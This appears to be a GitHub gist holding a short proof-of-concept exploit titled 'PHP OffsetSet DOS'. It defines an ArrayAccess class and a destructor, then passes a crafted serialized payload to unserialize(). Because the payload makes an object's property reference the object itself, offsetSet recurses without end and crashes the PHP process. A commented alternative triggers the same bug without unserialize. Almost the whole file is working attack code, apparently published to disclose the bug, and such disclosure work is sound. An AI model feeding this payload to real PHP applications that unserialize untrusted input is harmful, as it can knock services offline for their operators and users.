@dsadyrin
Created May 13, 2022 08:00
PHP OffsetSet DOS
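<?php
// Container whose offsetSet() writes through one of its own properties.
class Obj implements ArrayAccess {
    public function offsetExists($key) {
        return true;
    }
    public function offsetSet($key, $value) {
        // Any offset works; the write must go through an object property.
        // When $this->data refers back to this same object, this array-style
        // write calls offsetSet() again, so the recursion has no base case.
        $this->data[123] = 1;
    }
    public function offsetGet($key) {
    }
    public function offsetUnset($key) {
        return;
    }
}
class A {
    function __destruct() {
        // Array-style write on the Obj held in config invokes Obj::offsetSet().
        $this->config['username'] = 1;
    }
}
// Payload: an A whose config is an Obj, with Obj::data set to a reference (R:2) to that same Obj.
unserialize('O:1:"A":1:{s:6:"config";O:3:"Obj":1:{s:4:"data";R:2;}}');
// If you don't consider code with an unserialize() call a security issue, use the code below to trigger the bug.
/*
$o1 = new Obj;
$o1->data = &$o1;   // data becomes a reference to the object itself
$o2 = new A();
$o2->config = $o1;  // A::__destruct() then performs the array-style write
*/
?>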